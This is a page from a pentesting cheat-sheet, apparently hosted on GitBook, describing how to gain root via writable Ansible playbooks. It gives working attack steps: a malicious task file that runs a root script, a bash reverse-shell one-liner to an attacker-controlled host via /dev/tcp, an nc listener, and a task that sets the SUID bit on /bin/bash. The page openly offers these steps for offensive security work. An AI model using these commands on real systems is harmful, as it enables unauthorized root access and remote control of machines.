Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page

Ansible Playbook Privilege Escalation

Ansible Playbooks are lists of tasks that automatically execute against hosts.

PrivEsc with Tasks

First off, check the content of playbook in /opt/ansible/playbooks. For instance, a file named “httpd.yaml”.

- name: Install and configure Apache
  ...
  roles:
    - role: geerlingguy.apache
  tasks:
    - name: configure firewall
      firewalld:
        ...
Copied!

Next, check the content of configure files in /opt/ansible/roles/geerlingguy.apache/tasks. And add the exploitable file in this. For example, a file named “shell.yml”.

- hosts: localhost
  tasks:
    - name: RShell
      command: sudo bash /tmp/root.sh
Copied!

Create a exploit for reverse shell.

echo '/bin/bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1' > /tmp/root.sh
Copied!

Then open a listener in local machine.

nc -lvnp <local-port>
Copied!

At the end, execute “ansible”

ansible
# or
ansible-playbook  
# or
sudo -u <some-user> ansible
Copied!

PrivEsc with Automation Task

If the target system runs automation tasks with Ansible Playbook as root and we have write permission of task files (tasks/), we can inject arbitrary commands in yaml file. For example, create a new file /opt/ansible/tasks/evil.yaml.

- hosts: localhost
	tasks:
	  - name: Evil
	    ansible.builtin.shell: |
	      chmod +s /bin/bash
	    become: true
Copied!

After a while, we can escalate the root privilege by executing the following command.

/bin/bash -p
NextApache Conf Privilege Escalation

Last updated 1 year ago

  • PrivEsc with Tasks
  • PrivEsc with Automation Task
Page cover image